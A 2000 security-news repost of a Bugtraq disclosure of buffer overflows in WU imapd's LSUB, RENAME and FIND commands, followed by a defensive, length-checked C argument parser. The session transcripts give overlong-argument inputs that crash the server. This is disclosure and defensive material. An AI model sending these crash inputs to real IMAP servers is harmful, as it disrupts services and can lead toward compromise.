Originally Published: Saturday, 22 April 2000
Author: Alexander Reelsen
Published to: news_enhance_security/Security News

WU imapd reveals more and more buffer overflows

The IMAP daemon from Washington University seems to have many more buffer overflows than first suspected.


From: Michal Szymanski
Subject: Re: another WU imapd buffer overflow
To: BUGTRAQ@SECURITYFOCUS.COM

Hi again,

imapd seems to be very weak. I've found another three buffer overruns. This time the affected commands are LSUB, RENAME and FIND:

* OK mail IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* lsub "" AAAAAAAAAAAAA.... (#A 1024 - 8179)

SIGSEGV received.

* OK localhost IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* rename inbox AAAAAAAAAAAAA.... (#A 1021 - 8174)

SIGSEGV received.

* OK localhost IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* find all.mailboxes AAAAAAAAAAAAA.... (#A 1026 - 8168)

SIGSEGV received.

It seems that all two-argument commands in authenticated state - where the second argument is a string - are vulnerable. I'm not sure, but ipop2/3d works fine in all states, also in transaction state. Mark, am I right?

Regards,

Michal Szymanski [michal_szymanski@linux.com.pl]
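
An added example, not part of the Bugtraq message and not code from WU imapd: a length-checked C parser for the arguments of a two-argument command such as LSUB or RENAME, which rejects an overlong argument before any byte is copied into a fixed buffer. The 1024-byte capacity, the function and constant names and the sample input are assumptions made for illustration; only atoms and simple quoted strings are handled.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define ARG_CAP 1024  /* assumed buffer size, not taken from the imapd source */

enum parse_rc { PARSE_OK = 0, PARSE_MISSING = -1, PARSE_TOO_LONG = -2 };

/* Copy one atom or "quoted" string from *pp into out (capacity cap) and
 * advance *pp. The length is measured and checked before anything is written. */
static enum parse_rc next_arg(const char **pp, char *out, size_t cap)
{
    const char *p = *pp, *start;
    size_t len;

    while (*p == ' ') p++;
    if (*p == '\0') return PARSE_MISSING;
    if (*p == '"') {
        start = ++p;
        while (*p && *p != '"') p++;
        if (*p != '"') return PARSE_MISSING;    /* unterminated quote */
        len = (size_t)(p - start);
        p++;                                    /* skip closing quote */
    } else {
        start = p;
        while (*p && *p != ' ') p++;
        len = (size_t)(p - start);
    }
    if (len >= cap) return PARSE_TOO_LONG;      /* keep room for the NUL */
    memcpy(out, start, len);
    out[len] = '\0';
    *pp = p;
    return PARSE_OK;
}

/* args is the text after the command word, e.g. `"" pattern` or `old new`. */
enum parse_rc parse_two_args(const char *args, char *a1, char *a2, size_t cap)
{
    enum parse_rc rc = next_arg(&args, a1, cap);
    return rc != PARSE_OK ? rc : next_arg(&args, a2, cap);
}

int main(void)
{
    char a1[ARG_CAP], a2[ARG_CAP], line[2048] = "inbox ";
    memset(line + 6, 'A', 1500);   /* constructed overlong second argument */
    printf("%d\n", parse_two_args(line, a1, a2, sizeof a1));
    return 0;
}
```

A server using a routine like this would answer the oversized command with an error response instead of copying the argument.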




